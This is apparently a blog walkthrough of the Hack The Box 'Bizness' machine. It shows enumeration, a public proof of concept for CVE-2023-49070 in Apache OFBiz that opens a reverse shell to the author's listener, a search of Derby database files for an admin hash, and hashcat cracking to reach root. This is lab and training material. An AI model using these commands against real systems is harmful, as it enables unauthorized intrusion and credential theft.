341 words
2 minutes
Bizness
2024-01-15
HTB Machines
HTB
/
HTB-S4
  • Easy rated box
  • Web application using Apache OfBiz Framework

Enumeration#

nmap -sCV -p- --min-rate 10000 <ip-addr>

<img src=../../assets/bizness_assets/1.jpg>

The ip address resolves to bizness.htb so I placed that in my /etc/hosts file

echo "10.10.11.252 bizness.htb" | sudo tee -a /etc/hosts

After visiting the site, I did a quick directory bruteforce and noticed various endpoints. <img src=../../assets/bizness_assets/2.jpg>

They all seem to resolve to a login page. All of these login pages quickly identified that Apache OFBiz is being used, most specifically Apache OFBiz 18.12

<img src=../../assets/bizness_assets/3.jpg>

Doing a quick search on my favorite vulnerability database, reveals 2 particular vulnerabilities CVE-2023-51467 and CVE-2023-49070 both allowing RCE

<img src=../../assets/bizness_assets/4.jpg>

Exploitation#

For this exploit, I am going to be using abdoghazy2015’s PoC for CVE-2023-49070, but before we use it we first need to use OpenJDK v11 as the exploit was developed using that. We also need to get ysoserial

sudo update-alternatives --config java
nc -nvlp 4444
python3 exploit.py https://bizness.htb shell <your-ip>:<your-port>

<img src=../../assets/bizness_assets/5.jpg>

Post Exploitation#

System Enumeration was done from here:

cat /etc/hosts
printenv
ps aux | grep root
netstat -tulpn
find / -type f -user root -perm -4000 2>/dev/null

Nothing interesting came up except that ofbiz is the only user account created.

I also noticed it’s using derby DBMS. Apache OFBiz uses derby as it’s default DBMS, so we can likely find a password for root.

<img src=../../assets/bizness_assets/6.jpg>

/opt/ofbiz/runtime/data/derby/ofbiz/seg0 seems to have a lot of .dat files, this part was probably the most painful part. I used this command to search for it and it revealed a hashed password

cat * | grep -a 'admin'

<img src=../../assets/bizness_assets/7.jpg>

This password cannot be normally cracked by john or hashcat, we will need to take a look at the src code to figure out how this password is encrypted. You can check the source code using this link

To give the run down, it’s base64-urlsafe encoded so we’ll need to decode it then convert it to HEX then we can pass it to hashcat to crack as a SHA-1 in this format:

hash:salt

For this, I used Cyberchef

I then used hashcat to crack the password:

hashcat -m 120 "b8fd3f41a541a435857a8f3e751cc3a91c174362:d" /usr/share/wordlists/rockyou.txt

<img src=../../assets/bizness_assets/8.jpg>

We can now use this password to su to root

su -

<img src=../../assets/bizness_assets/9.jpg>

Bizness
https://fuwari.vercel.app/posts/bizness/
Author
Balejin
Published at
2024-01-15
Monitored
Broker
© 2024 Balejin. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari